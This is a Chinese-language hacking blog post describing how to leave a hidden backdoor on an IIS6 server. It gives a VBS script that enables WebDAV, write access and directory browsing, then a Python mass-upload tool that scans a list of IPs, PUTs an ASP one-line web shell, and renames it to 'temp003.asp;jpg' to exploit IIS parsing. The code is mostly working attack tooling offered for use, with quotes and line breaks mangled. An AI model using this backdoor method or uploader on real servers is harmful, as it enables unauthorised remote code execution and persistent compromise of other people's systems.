IIS一種鮮為人知的留后門方式
責編:admin |2015-02-11 10:58:08今天記錄的就是人為制造WebDAV驗證上傳的洞洞,也就是俗稱的“IIS寫權限的利用”.
要將其作為“后門”來使用,我覺得應該符合我上面所說的兩點中的后者,所以最好是選擇一個爬蟲或者一般的web相對路徑爆破所難以抓到的路徑,來開啟Write權限,當然打開WebDAV擴展之后,提交Option的HTTP VERB是很容易知道你有PUT和MOVE權限的。而手動開啟這些配置你可能需要打開IIS管理器,在GUI下操作,但是hacking當然是do all in shell最裝13啦。所以不妨用vbs來實現整個過程。
for the IIS6
Option Explicit
Dim objIIsWebService
Set objIIsWebService = GetObject(“IIS://localhost/W3SVC”)
objIIsWebService.EnableWebServiceExtension “WEBDAV”
objIIsWebService.SetInfo
Dim objIIsWebSite
Set objIIsWebSite = GetObject(“IIS://localhost/W3SVC/1/ROOT”)
objIIsWebSite.AccessRead = True
objIIsWebSite.AccessSource = True
objIIsWebSite.AccessWrite = True
objIIsWebSite.EnableDirBrowsing = True
objIIsWebSite.SetInfo
這里需要解釋的ADSI方式操作中 IIS://ComputerName/Service/Website/Directory 這種形式所表示的路徑,其中website可以通過IIS管理器的identifier來獲得,或者使用注入IISSPY這里小腳本,或者使用IIS自帶vbs腳本來獲得。如默認站點的絕對路徑為 C:inetpubwwwroot ===> IIS://localhost/W3SVC/1/ROOT 則其根目錄下的darkray路徑對應為 IIS://localhost/W3SVC/1/ROOT/darkay.事實上你可以構造一個比較完美的腳本,建立一個非默認路徑的映射比如放到D:
eycler下等,更多可以參考《使用腳本對IIS進行深入管理》& http://blog.sina.com.cn/s/blog_9840bb7f0100xyxl.html。
剩下就是利用了,可以用老兵前輩的IISPUT小工具來弄,或者burp發包,再或者curl在shell展示下酷炫,這里引用一下寫好的py腳本
http://www.subhashdasyam.com/2011/04/python-iis-scanner-with-auto-uploading.html
#!/usr/bin/python
import socket,re,urllib,urllib2,os,sys
def options():
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((t_IP,t_port))
req = “OPTIONS / HTTP/1.1
”
req += “Host: ” + t_IP + “
”
req += “Connection: close
”
req += “
”
#print req
sock.send(req)
data = sock.recv(1024)
sock.close()
r1 = re.compile(‘DAV’)
result = r1.findall(data)
if result == []:
print “On bad…the web DAV is not open.
”
else:
print “WA HAHA LET US CHECK MORE time”
return None
def put():
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((t_IP,t_port))
text = ‘<%execute request("hacker")%>‘
print “File content:
” + text
file_length = len(text)
req = “PUT /” + ‘temp003.txt’ +” HTTP/1.1
”
req += “Connection: close
”
req += “Host: ” + t_IP + “
”
req += “Content-Type: text/xml; charset=’utf-8′
”
req += “Content-Length: ” + str(file_length) +”
”
req += text + “
”
sock.send(req)
data = sock.recv(1024)
sock.close()
r2 = re.compile(‘OK’)
result = r2.findall(data)
if result == []:
print “On bad…the web is not wirrten.
”
else:
print “OK code uploaded”
print “
code here ” + ‘http://’+t_IP+’/'+’temp003.txt’
def move():
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((t_IP,t_port))
req = “MOVE /” + ‘temp003.txt’ +” HTTP/1.1
”
req += “Host: ” + t_IP + “
”
req += “Destination: http://” + t_IP +’/'+ ‘temp003.asp;jpg’+”
”
sock.send(req)
data = sock.recv(1024)
sock.close()
r3 = re.compile(‘asp’)
result = r3.findall(data)
if result == []:
print “On bad…the web is not wirrten.
”
else:
print “
_shell :D and check RESULT.TXT
http://” + t_IP +’/'+ ‘temp003.asp;jpg’+”
”
temp=”http://” + t_IP +’/'+ ‘temp003.asp;jpg’
os.system(‘echo’+’ ‘+ temp +’ >>RESULT.txt’)
t_port = 80
print “===============Auto Upload Shell==================”
print “
[1] Check the Vulnerability”
#IP=raw_input(“enter your target ip like 1.1.1.0/24:”)
#inp = raw_input(“enter your choice:”)
#if inp == ’1′:
# options()
# if options() is None:
# put()
# move()
IP=raw_input(“enter your txt position like C:1.txt:”)
f=open(IP,’r')
lines=f.readlines()
#b = ‘nmap’+’ ‘+’–open ‘+”+’-p 80 ‘ + ” + IP
#print b +’
’+'Now go for find the dork server’
#a = str(os.popen(b).readlines())
#r1 = re.compile(“d*.d*.d*.d*”)
#ip = r1.findall(a)
ips=[]
#if ip==[]:
# sys.exit()
for x in lines:
x=x.strip()
ips.append(x)
for y in ips:
t_IP = y
try:
print ‘now scan the ‘+y
options()
if options() is None:
put()
move()
except:
continue
print “Enjoy the Shell”